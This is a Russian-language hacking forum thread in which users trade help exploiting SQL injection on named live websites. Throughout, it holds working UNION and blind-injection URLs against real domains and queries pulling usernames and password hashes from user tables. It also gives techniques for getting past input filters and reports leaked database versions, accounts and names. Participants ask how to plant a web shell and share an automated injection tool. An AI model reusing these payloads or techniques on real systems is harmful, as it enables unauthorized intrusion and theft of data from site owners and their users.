http://www.xtrempc.ro/modules.php?id_articol=-8177+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20&name=Articole&skin=0&subtip=Stire&tip=jocuri

а дальше PHP Nuke не пускает запросы делать, какие предложения?

http://www.xtrempc.ro/modules.php?id_articol=-8177+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,@@basedir,1 2,13,14,15,16,17,18,19,20&name=Articole&skin=0&subtip=Stire&tip=jocuri

/usr/local/mysql/

basedir съело..

@@basedir, @@version_compile_os....etc
такие запросы сьедает...я про основные и как мне вывести инфу из БД

Здравствуйте.Я нашел sql-inj подобрал столбцы http://shop.vuku.ru/index.php?productID=-445+union+select+1,2,3,4-- но почему-то я немогу даже версию узнать бд.В чем моя ошибка?Что оттуда можно вытащить?

@@basedir, @@version_compile_os....etc
такие запросы сьедает...я про основные и как мне вывести инфу из БД
http://www.xtrempc.ro/modules.php?id_articol=-8177+UNION+SELECT+1,2,username,4,5,6,7,8,9,10,user _password,12,13,14,15,16,17,18,19,20+from+nuke_use rs+limit+1,1&name=Articole&skin=0&subtip=Stire&tip=jocuri
все вроде нормально выводится, только скобочки нельзя ставить

Здравствуйте.Я нашел sql-inj подобрал столбцы http://shop.vuku.ru/index.php?productID=-445+union+select+1,2,3,4-- но почему-то я немогу даже версию узнать бд.В чем моя ошибка?Что оттуда можно вытащить?
У тебя там вывода нету...используй как слепую..
http://forum.antichat.ru/threadnav43966-1-10.html
Пункт 3.3

DimOnOID, а там разве слепая есть?

DimOnOID, а там разве слепая есть?
Как минимум 2 варианта использования слепой....
с задержкой сервера....или через ошибку мускуля…

Разве, что, но там не не перестает выводить при некорректном запросе. Забавная скуля...

Вроде в этом квесте http://realquest.real-host.ru/show.php?id=12' такая же скуля.

http://realquest.real-host.ru/show.php?id=12+and+substring(version(),1,1)=5

СКуль, давно находил уже как с открытия, там фильтр жёсткий

TreV@N обычная слепая скуля
http://realquest.real-host.ru/show.php?id=12+AND+SUBSTRING((version()),1,1)=x

Version : 5.0.77-community
User : realq137_quest@localhost
Database : realq137_quest

Чи не фильтр(Скуля зрячая, надо просто немного подумать:)):
http://realquest.real-host.ru/show.php?id=-12+UNION+SeSelectlect+1,concat_ws(0x3a,user(),vers ion(),database()),3,4--+

Хех, там такой же фильтр, как я писал давно :) тупо удаляет юнион :).

Набрал такую ссылку,вывел мне запрос гляньте скажите че это
http://www.spravkaweb.ru/javascript:_alert%28%27Hello_world%27%29%3B

http://www.spravkaweb.ru/jhj'_union_select_1,2,3,concat(user(),0x3a,version ()),5,'1
забавная скуль)
жаль, что знак подчеркивания на пробел заменяется...

этой скулью можно ченить сделать веселого?

ребят помогите пожалуйста
на одном сайте есть регалка в которой не фильтруется кавычка при этом база выдает ошибку такого вида

Warning: mssql_query() [function.mssql-query]: message: Unclosed quotation mark before the character string '1\')'. (severity 15) in /opt/lampp/htdocs/register/processor.php on line 32

Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '1\')'. (severity 15) in /opt/lampp/htdocs/register/processor.php on line 32

Warning: mssql_query() [function.mssql-query]: Query failed in /opt/lampp/htdocs/register/processor.php on line 32
Ошибка выполнения запроса! Видимо что-то не так... SELECT * FROM users WHERE (name = '1\'')

Можно ли чего с этим сделать???

Судя по выводимой ошибки для завершения запроса необходима кавычка а у тебя она слешируеться.

ребят помогите пожалуйста
на одном сайте есть регалка в которой не фильтруется кавычка при этом база выдает ошибку такого вида



Можно ли чего с этим сделать???
magic quotes экранирует кавычку..

спасибо пойду гуглить...

2 aqqa

http://www.spravkaweb.ru/php'/**/and/**/1=2/**/union/**/select/**/1,2,3,(select/**/1/**/from/**/user/**/limit/**/0,1),5,6/**/and/**/'1'='1

Вместо 1 подбирай имя столбца =)

А вот нашел кое что круое

Warning: oci_execute(): ORA-01460: unimplemented or unreasonable conversion requested in /srv/www/apache2/htdocs/cms_adm/lib/44/oracle.class.php on line 95
array (
0 => 'http://www.spravkaweb.ru/php\'/**/and/**/1=2/**/union/**/select/**/1,2,3,(select/**/1/**/from/**/user/**/limit/**/0,1),5,6/**/and/**/\'1\'=\'1',
1 => '',
)
аракловская база линуксовый сервак,

Добрый день всем !

Возникли трудности с сайтом! SQL-inj есть а вот вывод настроить не получается...
Доступ к mysql.user и information_schema.columns закрыты =(
http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4--

Как можно обойти это?

Заранее спасибо!

Snap, там 4 ветка - информатион_счема вообще нету

Юзай мор1ров, подбирай имя таблицы

http://www.delocrat.ru/index.php?productID=1324+and+1=if(ascii(substring( (select+1+from+[имя_табл]+limit+0,1),1,1))>1,1,(select+1+union+select+2))

Либо попробуй найти вывод в других местах

Snap, там 4 ветка - информатион_счема вообще нету

http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4+from +information_schema.columns--

Access denied for user 'delocr01'@'%' to database 'information_schema' SQL query : select photoID, filename, thumbnail, enlarged from SS_product_pictures where photoID!=1483 AND productID=1324 union select 1,2,3,4 from information_schema.columns--

http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4+from +information_schema.columns--
Ты ошибку то читал.....
те так и пишут
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'information_schema.columns--'

Snap, напиши так

http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4+from +skjdhfjkshk234k34h.columns--

Будет


Access denied for user 'delocr01'@'%' to database 'skjdhfjkshk234k34h' SQL query : select photoID, filename, thumbnail, enlarged from SS_product_pictures where photoID!=1483 AND productID=1324 union select 1,2,3,4 from skjdhfjkshk234k34h.columns--


Из этого по твоему следует, что существует база skjdhfjkshk234k34h к которой у нас нету доступа ?)

Натолкнулся на mysql инъекцию в многострочном запросе,

SELECT cats.*,
IF(subcats.id IS NULL, 'N', 'Y') AS has_subcats,
subcats.name AS subcat_name,
parentcat.name AS parentcat_name
FROM cats
LEFT JOIN cats AS subcats ON subcats.parent_id = cats.id
LEFT JOIN cats AS parentcat ON parentcat.id = cats.parent_id
WHERE 1 AND cats.id = 145 [INJECT] GROUP BY cats.id
ORDER BY cats.order_fld,cats.name


Дак вот комментарий типа /* не прокатывает, а -- закомментирует только одну строку, ктонибудь знает выход из ситуации?

попробуй # в качестве комментария

потскажите если на сайте версия 4,0,2 какие могут быть таблицы старые не идут

попробуй # в качестве комментария

Вставил - в запросе не появляется. Подставил как %23 - появилась, но комментится так же одна строка

prescott, попробуй обрезать нуль-байтом.
К примеру:
http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7%00
http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7

Дак вот комментарий типа /* не прокатывает, а -- закомментирует только одну строку, ктонибудь знает выход из ситуации?

маниа.ком ?

Если да, то я раскручивал ту скулю как слепую. При истинности выражения (and 1=1) цвет фона будет зеленый, а при ложности (and 1=2) - синий. Ну и дальше по шаблону .. ветка там 5

prescott, попробуй обрезать нуль-байтом.
К примеру:
http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7%00
http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7


первое что попробовал - не помогло
маниа.ком ?

Если да, то я раскручивал ту скулю как слепую. При истинности выражения (and 1=1) цвет фона будет зеленый, а при ложности (and 1=2) - синий. Ну и дальше по шаблону .. ветка там 5

Тоже уже сплоит работает =)

prescott,
#%0A# проверь

Это сути дела не меняет(перевод строки то останется в старом запросе), будет:

WHERE 1 AND cats.id = 145 [INJECT]#
#
GROUP BY cats.id
ORDER BY cats.order_fld,cats.name


Попробуй продолжить запрос, например:

SELECT cats.*,
IF(subcats.id IS NULL, 'N', 'Y') AS has_subcats,
subcats.name AS subcat_name,
parentcat.name AS parentcat_name
FROM cats
LEFT JOIN cats AS subcats ON subcats.parent_id = cats.id
LEFT JOIN cats AS parentcat ON parentcat.id = cats.parent_id
WHERE 1 AND cats.id = -98145 union select 1,(select 1 from table limit 1),3 from cats GROUP BY cats.id
ORDER BY cats.order_fld,cats.name

правда в 5-как с альясами при union выдаст тебе что cats.id - нема такой таблички(Unknown column 'id' in 'order clause'):

Also, if a column to be sorted is aliased, the ORDER BY clause must refer to the alias, not the column name.

Здравствуйте, прошу помочь обойти фильтры в скуле:

http://www.terra.mu/list.php?c=download&s=title&o=&p=&w=asc%2527

Мало того, что там инъекция после order by ПОЛЕ, еще и фильрация (кривая, но пашущая). Хз, получиться ли что-то из этого.

ttp://www.otoptravel.com/Qua.php?id=1
MsSQL. Не выводятся даные.

Не могу подобрать НИ количество столбцов и полей, как только я не крутил....не понимаю в чем проблема....
вот ссыль: http://www.windpress.it/aziende.php?ricerca=A_SCH&id=1318 (MYSQL Injection)

При любом раскладе пишет: The used SELECT statements have a different number of columns


если кто нить подберет,расскажите пожалуйста.

П.С. Сайт итальянского банка.

jecka3000
скорее всего это слепая скуля...

http://www.windpress.it/aziende.php?ricerca=A_SCH&id=1318+AND+SUBSTRING((version()),1,1)=4

Version: 4.1.16-standard
Database:CRM
User:windpress@media

Как обойти?

http://design.websys.ru/?do=list&sex=1+UNION+SELECT+CHARACTER_MAXIMUM_LENGTH+FROM+I NFORMATION_SCHEMA.COLUMNS+LIMIT+1,1+--+&goal%5B0%5D%3D&goal%5B1%5D%3D&goal%5B2%5D%3D&goal%5B3%5D%3D&goal%5B4%5D%3D&page=0

Вывод норм, как только тейбл нейм так и все
Всего: 64


Тож самое только когда вводишь юзера
http://design.websys.ru/?do=list&sex=1+UNION+SELECT+concat_ws(0x0b,0x0b,version(),d atabase(),0x0b)+LIMIT+1,1+--+&goal%5B0%5D%3D&goal%5B1%5D%3D&goal%5B2%5D%3D&goal%5B3%5D%3D&goal%5B4%5D%3D&page=0

5.0.67-log
u7749_2

используй hex():
http://design.websys.ru/?do=list&sex=1+UNION+SELECT+concat_ws(0x0b,0x0b,hex(user()) ,database(),0x0b)+LIMIT+1,1+--+&goal%5B0%5D%3D&goal%5B1%5D%3D&goal%5B2%5D%3D&goal%5B3%5D%3D&goal%5B4%5D%3D&page=0
http://design.websys.ru/?do=list&sex=1+UNION+SELECT+concat_ws(0x0b,0x0b,hex(TABLE_N AME),0x0b)+FROM+information_schema.TABLES+LIMIT+1, 1+--+&goal%5B0%5D%3D&goal%5B1%5D%3D&goal%5B2%5D%3D&goal%5B3%5D%3D&goal%5B4%5D%3D&page=0

Заметил в хостинге такие ошибки
aultCode1faultStringWarning:mysql_connect() [function.mysql-connect]: Access denied for user 'rang'@'localhost' (using password: YES) in /usr/home/freehost/www/index.php on line 48faultCode1faultStringWarning:mysql_select_db(): supplied argument is not a valid MySQL-Link resource in /usr/home/freehost/www/index.php on line 49faultCode1faultStringWarning:mysql_query(): supplied argument is not a valid MySQL-Link resource in /usr/home/freehost/www/index.php on line 53faultCode1faultStringWarning:mysql_fetch_array() : supplied argument is not a valid MySQL result resource in /usr/home/freehost/www/index.php on line 55
а когда начал лить двиг то вылезло вот такое
/home/freehost/www/freehostusers/) in /mnt/d2/freehostusers/flairh6/my/index.php
flairh6/my- это мое, а остально ето хостинга
непобоюсь минуса в профиле, но все таки спрошу, как это можно использовать? :)

В скрипте есть такой участок кода:
$nomer = $_GET['nomer'];
$art = mysql_query("SELECT article FROM chat_articles WHERE nomer=$nomer");
$article = mysql_result($art,0);
Понятно что здест скуля, только проблема в том как её заюзать из-за реврайта?
Вот правило для модреврайт:
RewriteRule ^art/([a-z0-9]*)/([a-z0-9]*)/?$ art.php?ver=$1&nomer=$2 [L,QSA]
Возможно ли в этом случае произвести иньекцию и если да то каким образом?

Flair
Заметил в хостинге такие ошибки
Цитата:
aultCode1faultStringWarning:mysql_connect() [function.mysql-connect]: Access denied for user 'rang'@'localhost' (using password: YES) in /usr/home/freehost/www/index.php on line 48faultCode1faultStringWarning:mysql_select_db(): supplied argument is not a valid MySQL-Link resource in /usr/home/freehost/www/index.php on line 49faultCode1faultStringWarning:mysql_query(): supplied argument is not a valid MySQL-Link resource in /usr/home/freehost/www/index.php on line 53faultCode1faultStringWarning:mysql_fetch_array() : supplied argument is not a valid MySQL result resource in /usr/home/freehost/www/index.php on line 55

а когда начал лить двиг то вылезло вот такое
/home/freehost/www/freehostusers/) in /mnt/d2/freehostusers/flairh6/my/index.php
flairh6/my- это мое, а остально ето хостинга
непобоюсь минуса в профиле, но все таки спрошу, как это можно использовать?

Это просто не конектится(подключатся) МускуЛ...........

В скрипте есть такой участок кода:
$nomer = $_GET['nomer'];
$art = mysql_query("SELECT article FROM chat_articles WHERE nomer=$nomer");
$article = mysql_result($art,0);
Понятно что здест скуля, только проблема в том как её заюзать из-за реврайта?
Вот правило для модреврайт:
RewriteRule ^art/([a-z0-9]*)/([a-z0-9]*)/?$ art.php?ver=$1&nomer=$2 [L,QSA]
Возможно ли в этом случае произвести иньекцию и если да то каким образом?
Попробуй обратиться к скрипту на прямую art.php?ver=1&nomer=-1[SQL] хотя скорее всего тебя пошлют с NOT FOUND или реврайт на индекс, а так единственая проблемма это пробелы потому как судя по SQL запросу коментить ничего не надо(хотя я больше чем уверен что пременная используеться где то еще в SQL запросе).

есть sql-inj
http://www.yetinepal.com/modules/school/school.php?id=2+order+by+1
количество столбцов - 1
пробую union select
http://www.yetinepal.com/modules/school/school.php?id=2+uNion+sElecT+1
получаем 1222 - The used SELECT statements have a different number of columns
как такие ситуации можно обойти?

P.s. мускул пятый

http://www.yetinepal.com/modules/school/school.php?id=2+and+substring(version(),1,1)=5

Например, раскрутить как блинд

Всем привет внимание вопрос:
попался сайт со скулей, но запрос вида ?id=1+union+select+1,2,3,4/*
выдаёт, - "Ошибка - две страницы с одним идентификатором"
что за хрень? впервые такое вижу(
Если неправильное число полей, то
The used SELECT statements have a different number of columns
т.е. тут ок.
Что с этим можно сделать?

Попробую id=-1[sql]

Попробую id=-1[sql]
Пробовал, в этом случае пропадает весь текст, остаётся только костяк сайта, вывода нет(

Давай линк, иначе будет гадание на кофейной гуще на 10 страниц

_http://www.niat.ru/design/page_rus.php?id=1+union+select+1,2,3,4/*
тока не дефейсить

Поле 2 и 3 отвечают за путь до изображения вверху страницы,в поле 3 проходят тока цифры и по всей видимости там либо JOIN либо сабселект или еще одна гверя так как патч до этого изображения по всей видимости береться из бд(потому как если указать от балды значения то путь до изображения идет пустой), а во втором поле идет какой то фильтр на выводимые данные потому как ничего кроме 0x2f(/) и 0x2e(.) в нем не проходят(возможно file_exists() и etc), вывод в 1-ом и 4-ом поле на страницу я не увидел, только блайнд по всей видимости, версия 5 http://www.niat.ru/design/page_rus.php?id=8+and+substring(version(),1,1)=5

PaCo куда торопишься? :)

http://www.niat.ru/design/page_rus.php?id=11111+union+select+1,2,concat(0x3a 3a3a3a,Version()),4/*

Grey: Джок, тебе повезло, что тут вывод в сообщение об ошибке, но там двойной запрос и в идеале нужно так юзать:

http://www.niat.ru/design/page_rus.php?id=1+and+1=2+union+select+1,2,0x31206 16e6420313d3220756e696f6e2073656c65637420636f6e636 17428273e272c76657273696f6e2829292f2a,4/*

Позвольте, что значит повезло? :) Я увидел там вывод, хотя искал двойной запрос. Есть вывод-нет заморочек

Grey: так не честно :(
А вообще ты так можешь паренька сильно загрузить и он может не понять, как так получилось с инъекцией, а это повлечет новые вопросы...

пожалуй паренька больше загрузит непонятный хекс в 3-м поле))
Кстати встречал как то подобную скулю

привет всем, я понимаю что на мой вопрос полюбому есть ответ в этой теме, но что бы не листать 757 страниц задам его ещё раз.
Как перевести таблицу в кеш?
Раньше пользовался http://nahta4ok.far.ru/tools.php , но вчера он закрыл свой сайт.
Может есть праги?

привет всем, я понимаю что на мой вопрос полюбому есть ответ в этой теме, но что бы не листать 757 страниц задам его ещё раз. Как перевести таблицу в кеш? Раньше пользовался http://nahta4ok.far.ru/tools.php , но вчера он закрыл свой сайт. Может есть праги?

а поиск поюзать?
и что за кеш? попробуй http://x3k.ru/ если конечно я тебя правильно понял

Дикс, прочитай внимательно https://forum.antichat.ru/showpost.php?p=1047515&postcount=72

Попробуй продолжить запрос, например:
SELECT cats.*,
IF(subcats.id IS NULL, 'N', 'Y') AS has_subcats,
subcats.name AS subcat_name,
parentcat.name AS parentcat_name
FROM cats
LEFT JOIN cats AS subcats ON subcats.parent_id = cats.id
LEFT JOIN cats AS parentcat ON parentcat.id = cats.parent_id
WHERE 1 AND cats.id = -98145 union select 1,(select 1 from table limit 1),3 from cats GROUP BY cats.id
ORDER BY cats.order_fld,cats.name


правда в 5-как с альясами при union выдаст тебе что cats.id - нема такой таблички(Unknown column 'id' in 'order clause'):

Also, if a column to be sorted is aliased, the ORDER BY clause must refer to the alias, not the column name.


вы неверно уловили суть проблемы, во
1-ых. по за-альяс'иным колонкам сортирует только груп, который находится в строке с inj.(%23)
2. у group другая ошибка
3. group в отличии от ордер бай в таких запросах сортирует ближайшую выборку
4. +не уверен, но group (в отличии от order) выполняется до формирования столбцов из select, а значит не должен ссылатся на альясы
5. даже если бы проблема была в group, альяс или колонку можно было бы вписать во вторую выборку
немного практики- узнаем имя бд(блинд или +union select 1 from lala%23)
и составляем запрос в такoм дуxe:

SELECT cats.*,
IF(subcats.id IS NULL, 'N', 'Y') AS has_subcats,
subcats.name AS subcat_name,
parentcat.name AS parentcat_name
FROM cats
LEFT JOIN cats AS subcats ON subcats.parent_id = cats.id
LEFT JOIN cats AS parentcat ON parentcat.id = cats.parent_id
WHERE 1 AND cats.id = 145 union select cats.*,table_name,1,2 from имя_базы.cats,information_schema.tables
GROUP BY cats.id
ORDER BY cats.order_fld,cats.nameконкретно здесь работать не будет, потаму что поля в ордербае задаются в виде имя_табл.колонка (что не катит в двойных запросах)
но если в вашей многострочной скуле order by поле то этот способ вам поможет)

Здравствуйте, подскажите пожалуйсто как можно залить шел через PHP иньекцию
Вот уязвимый сайт
http://www.cyl.ru/index.php?page=3&lang=../%00
Взял я его из раздела PHP иньекции.
Там уже залит шел, мне просто интеренсно, каким способом.... :)

1 Это не инклуд там file()
2 Тема что по инклуд, что про читалку достаточно обширная и отражена в статьях.

Т.е. нет такой кнопки "Залить шелл через инклуд" (Ну если только RFI :)), а переписывать сюда статьи для тебя не имеет смысла .

PS Что такое RFI тоже в статьях вот линки, читай:

https://forum.antichat.ru/thread12123.html
http://forum.antichat.ru/thread23501.html
https://forum.antichat.ru/thread91807.html
https://forum.antichat.ru/thread98525.html

[ Вопрос ] Автоматизация подбора полей и таблиц в MySQL и MsSql (надеюсь что тут этот вопрос можно задать)

Нужны данные проги, работающие по сабжу + независимо друг от друга...если кто то знает сие, то может и заделится))

консольные проги, работающие сами по себе приветствуются)

jecka3000
можете использовать SIPT
http://forum.antichat.ru/thread24918-sipt.html

А кто-нибудь может залить СИПТ 4.0 куда нить,т.к. все ссылки в темах битые....
К тому же качал несколько архивов с ним с 4 сайтов, ни один работает...

http://forum.antichat.ru/thread124949.html

А кто-нибудь может залить СИПТ 4.0 куда нить,т.к. все ссылки в темах битые....

Держи SIPT4 (http://narod.ru/disk/9796102000/setup.sipt4.rar.html)

вы неверно уловили суть проблемы, во
1-ых. по за-альяс'иным колонкам сортирует только груп, который находится в строке с inj.(%23)

Не согласен, при UNION по альясным колонкам в MySQL 5 нужно сортировать ТОЛЬКО ORDER http://dev.mysql.com/doc/refman/5.1/en/union.html:

Also, if a column to be sorted is aliased, the ORDER BY clause must refer to the alias, not the column name. The first of the following statements will work, but the second will fail with an Unknown column 'a' in 'order clause' error



конкретно здесь работать не будет, потому что поля в ордербае задаются в виде имя_табл.колонка (что не катит в двойных запросах)

Конкретно ни где это работать не будет(если продемострируете работоспобный запрос для 5 версии MySQL то я буду только рад этому) изходя из первого условия для UNION,ORDER BY и MySQL 5. Согласен с of ORDER BY cannot use column references that include a table name но я и не утверждал что это не так. Ваш запрос такой же не работоспособный был бы если в ORDER сортировался просто по именни колонки без table name.
cats.*
+Боюсь предположить что это при определеных условиях вызовет - #1222 - The used SELECT statements have a different number of columns

Не согласен, при UNION по альясным колонкам в MySQL 5 нужно сортировать ТОЛЬКО ORDER
я говорил про этот запрос, а не образно)
=>2
select columns.*,1,2/*или сколько там*/ from columns order by columns.column_name
select columns.*,1,2 from columns union select tables.* from tables order by columns.column_name
select columns.*,1,2 from columns union select tables.* from tables order by column_name
+Боюсь предположить что это при определеных условиях вызовет
например?)

я говорил про этот запрос, а не образно)

Мдя, а в 1 своем посте я не про это писал(как тогда воспринимать ваши заявления,и понт было это отписывать не пойму, это типа того у кого больше яйца)?


select columns.*,1,2 from columns union select tables.* from tables order by columns.column_name

К чему это? Мало того что вы сами описали почему это не работает, разговор то идет про альяс в первом запросе и про иньект до ордер по названию колонки в оригинале и версию MySQL 5.(e.g. select table_name as lol, table_schema as lol2 from columns
where column_name='user' [sql_injection] order by table_name)

например?)

Например если кодер поймет что ему не надо все значения из columns:

select 3,1,2 from columns union select tables.* from tables order by column_name

З.Ы. Давайте закончим эту пустой спор, ничего нового я не узнал и из того что вы написали, равно как и вы от того что написал я, если с чем то не согласны и хотите обсудить, для этого есть ПМ.

приведёный пример никак не связан с этой скулей, что касается 3,1,2 - из этой же области: таблица cats.* не везде существует, админ пролил пиво на системник, ...; мой пост был не понтом, а замечанием, что inj в общем случае возможна.

if (strpos($clean, 'union') !== false && preg_match('~(^|[^a-z])union($|[^[a-z])~s', $clean) != 0)
$fail = true;
Можно ли (если да, то как?) обойти такую фильтрацию?

strpos() чувствителен к регистру UNION он не заметит.
А вот со stripos() такое не прокатит.

P.S. да и регулярка тоже чувствительна к регистру без i, т.е. они тоже проглотит UNION и ничего не заметит.

Да, но вся проблема в том, что переменная $clean изначально переводиться в нижний регистр (забыл упомянуть об этом в предыдущем посте).

Да, но вся проблема в том, что переменная $clean изначально переводиться в нижний регистр (забыл упомянуть об этом в предыдущем посте).

Тогда хрен что сделаешь, правда без union`a прожить можно - ведь можно и посимвольно инъекцию заюзать.

Grey, ага, только трабла в том, что селект фильтрует, тобишь посимвольный вывод даных из бд (кроме информации о ней) тоже не катит. // Sub selects? We don't use those either.
elseif (preg_match('~\([^)]*?select~s', $clean) != 0)
$fail = true;
Плюс еще к всему этому он фильтрует < и >, т.е. подбирать придется по очереди через =.

Сама уязвимость, если кому интересно
http://forum.antichat.ru/showpost.php?p=1328827&postcount=40

А эта регулярка уже кривая:

and (/*)*/select substring(version(),1))=4 - такое она пропустит

А что касается фильтрации < > - то можно юзать:

WHERE IN (0, 255) - по сути (вернее по скорости) тоже самое, что если юзать < >

А эта регулярка уже кривая:

(/*)*/select) - такое она пропустит
Если бы не //Comments? We don't use comments in our queries, we leave 'em outside!
elseif (strpos($clean, '/*') > 2 || strpos($clean, '--') !== false || strpos($clean, ';') !== false)
$fail = true;

Если бы не //Comments? We don't use comments in our queries, we leave 'em outside!
elseif (strpos($clean, '/*') > 2 || strpos($clean, '--') !== false || strpos($clean, ';') !== false)
$fail = true;

Не, а ты сразу не можешь все скопировать?
Я не телепат.

/**/and (/*)*/select substring(version(),1))=4

Ну такое к примеру прокатит, т.к. позиция первого /* будет равна 0. А strpos() ищет первое вхождение подстроки, в отличие от strrpos(), которая ищет последнее вхождение подстроки.

P.S. даже такое прокатит:

'/**/and (/*)*/select substring(version(),1))=4 - если кавычку надо где то закрыть, тут позиция будет равна 1.

И такое тоже:

')/**/and (/*)*/select substring(version(),1))=4 - если кавычку надо где то закрыть и скобку, тут позиция будет равна 2 (а вот 3 уже не прокатит).

Этого кстати должно хватить, получиться что то такое (к примеру):

1/**/and (/*)*/select substring(version(),1))=4

P.P.S. а на конце строке можно заюзать символ # (он тут не фильтруется) для за комментирования оставшийся части, правда при желание можно и не отбрасывать оставшуюся часть.

Ни один из вышеперечисленных вариантов не работает.
http://forum.rockmanpm.com/index.php?action=profile;sa=awardsMembers;u=1;id=1

Ни один из вышеперечисленных вариантов не работает.
http://forum.rockmanpm.com/index.php?action=profile;sa=awardsMembers;u=1;id=1

1. А откуда берётся значение переменной $clean?
2. Ты смотришь сорцы той же версии, что и форум по линку?

P.S. а вообще тестить лучше на локалке.

Разобрался

Сорцы не смотрел, но понял, что без них сказать что то сложно (возможно фильтрация идет в квери_стринг, а может как то очень по хитрому и по этому позиция /* определяется не правильно (не так как нам нужно)), но нашел другой выход:

Пример:

условие выполняется верно:
http://forum.rockmanpm.com/index.php?action=profile&sa=awardsMembers&u=1&id=1+and+(%23)%0Aselect+5)=5

условие выполняется не верно:
http://forum.rockmanpm.com/index.php?action=profile&sa=awardsMembers&u=1&id=1+and+(%23)%0Aselect+5)=4

Вот в чем фишка # - тоже комментирует строку и его они забыли добавить в фильтр (как я уже отметил раньше), значит мы его и заюзаем.
Единственное нужно учитывать - это то, что он комментирует только 1 строку, делаем так:

id=1+and+(%23)%0Aselect+5)=4

Получается так:

id=1 and (#)
select 5)=4

т.е. получается, что часть строки (а именно та, в которой закрывающая скобка) в запросе не участвует, но служит отличной закуской для регулярки, позволяя обойти фильтр.

P.S. %23 - урл код это символа #, %0A - урл код новой строки.

P.P.S. пошел запрягать РоА на написание сплоента)

if(ereg("^[0-9]+$",$ar["lid"] = $_GET['lid']))
{
$query = mysql_query("SELECT * FROM main WHERE lid = '$lid'");



Почему не работает вариант с NULL-байтом ? например, 5%00.Нулл байт же обходит проверку при ereg функциях.

Grey, спасибо за объяснения, не ожидал такой помощи. Я тестил у себя на локале, но т.к. это локал, ссыль выложил на другой форум.

PS: Сорсы этого "фильтра" - http://forum.rockmanpm.com/Sources/Subs.php~

Почему не работает вариант с NULL-байтом ? например, 5%00.Нулл байт же обходит проверку при ereg функциях.


Как именно не работает ? Как ты проверяешь ? меджик_квотес отключены ?

lid=2%00'+union+select+1--+ - должно работать

Велемир, пример того как ты обходил покажи

Ээ...пасип,но уже не имеет смысла.Там кавычки включены оказывается.

Решил чутка поменять на локалхосте:



$c = mysql_connect("localhost","root","vertrigo");

$user = $_GET['user'];


if(ereg("^[0-9]+$",$user)) {

echo "Ты хакер,обошедший фильтрацию!";

$q = mysql_query("Select * from mysql.user where User='$user'");

$r = mysql_fetch_array($q);

print_r($r);

}


else {

echo "Хакер!";

}




Результат только на кавычку катит,а запрос не провести.Пробовал ставить 1%00order+by+1 и т.д.

Вообще,нашёл эту хрень на сайте,висящем на двиге,похожий на вордпресс. Есть переменные: lid,o,c,start,actions.Может,кто скажет точнее ?

надо закрывать кавычку в запросе, как тебе ElteRUS написал
1%00'+union+select+1,2,n/*

Бесполезно:

http://localhost/ttt.php?user=1%00'+union+select+version()/*

Выводит тупо ошибку.На ордер ему пофиг.Запрос не провести

Валемир, а ты попробуй так:
http://localhost/ttt.php?user=1%00'+order+by+1--+

Будет ошибка:
Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result


А потом так:
http://localhost/ttt.php?user=1%00'+order+by+1000--+

Будет ошибка:
Warning: mysql_result(): supplied argument is not a valid MySQL result


Я прав или нет ?)

какая ошибка?

Чёрт побери,да ты прав!Только я заменил мускул резалт на феч аррай.Почему твой вариант работает?!? Ни --,ни /*,ни %3c не работает,а твой работает.Почему ?

Только я заменил мускул резалт на феч аррай


Это не обязательно было делать (:

Напиши у себя в скрипте

$q = mysql_query("Select Password from mysql.user where User='$lid'");
$r = mysql_result($q,0);
print_r($r);

А потом

http://localhost/ttt.php?user=1%00'+union+select+version()--+

И увидишь версию

Насчет ошибок: "--" должно иметь пробел вконце. Это написано в документации, а игнорировать документацию не хорошо. А "/*" должно быть не работает из-за кавычки ... там есть особенность, тут почитай http://phpclub.ru/mysql/doc/comments.html

http://localhost/ttt.php?user=1%00'+union+select+'1

можно без коментариев +))

Пасиб всем...Пошёл готовиться к войне)Отдельное мегаспасибо Spyder-у.Заставил его вспоминать:)

Писали в Хакере,что можно как-то обойти intval().реально это сделать ? (Провести полноценный запрос к БД)

Так не обойти:
$id = intval($_REQUEST['id']);
sql_query("select * from table_name where id=$id");
Так можно:
$id=$_REQUEST['id'];
if(intval($id))
{
sql_query("select * from table_name where id=$id");
}

https://forum.antichat.ru/thread56756.html

if ($do=="add") {

$ttitle=mhtml(substr($HTTP_POST_VARS["ttitle"],0,256));
$url=mhtml(substr($HTTP_POST_VARS["url"],0,256));
$email=mhtml(substr($HTTP_POST_VARS["email"],0,256));
$description=mhtml(substr($HTTP_POST_VARS["description"],0,2048));
$c1=intval($HTTP_POST_VARS["c1"]);

$error="";
if ($c1==0) $error.="<LI>".$LANG["mustbecat"];
if (empty($email)) $error.="<LI>".$LANG["mustbeemail"];
if (empty($url)) $error.="<LI>".$LANG["mustbeurl"];
if (empty($ttitle)) $error.="<LI>".$LANG["mustbetitle"];
if (empty($description)) $error.="<LI>".$LANG["mustbedescription"];

if (empty($error)) {
if ($cat["mailifnewlink"]=="yes") {
mail($cat["mailifnewlinkto"],$cat["mailifnewlinksubject"],"TITLE: $ttitle\nURL: $url\n");
}
mysql_query("INSERT INTO main SET title='$ttitle', description='$description', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());
require("template.php");
if($onregister == "on")
{
$headers = "From: $namesender <$emailsender>\n";
mail($email,$subjbefore,html_entity_decode($templb efore,ENT_QUOTES),$headers);
}
$r=mysql_query("SELECT max(lid) FROM main WHERE url='$url'") or die(mysql_error());
$cid=@mysql_result($r,0,0);
print ("<HTML><HEAD>\n");
print ("<META HTTP-EQUIV=refresh CONTENT='0;url=thx.php?id=$cid'>\n");
print ("</HEAD></HTML>\n");
die();
}
}



Скрипт: add.php

Функция: mhtml() // Самописная



function mhtml($t)
{
$t=StripSlashes($t);
$t=str_replace("'","'",$t);
$t=str_replace("\"","&quot;",$t);
return $t;
}



